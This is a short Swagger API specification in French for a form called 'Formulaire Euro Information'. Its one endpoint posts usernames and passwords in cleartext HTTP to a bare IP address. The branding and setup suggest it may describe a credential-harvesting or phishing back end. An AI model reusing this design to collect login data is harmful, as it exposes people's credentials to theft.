swagger: "2.0"
info:
  version: "1.0.0"
  title: "Formulaire Euro Information"
  description: "Formulaire d'envoi de données vers le serveur Euro Information."
host: "64.226.119.233"
basePath: "/"
schemes:
  - "http"
paths:
  /:
    post:
      summary: "Envoi des identifiants"
      consumes:
        - "application/x-www-form-urlencoded"
      parameters:
        - name: "username"
          in: "formData"
          required: true
          type: "string"
        - name: "password"
          in: "formData"
          required: true
          type: "string"
      responses:
        "200":
          description: "Requête envoyée avec succès"
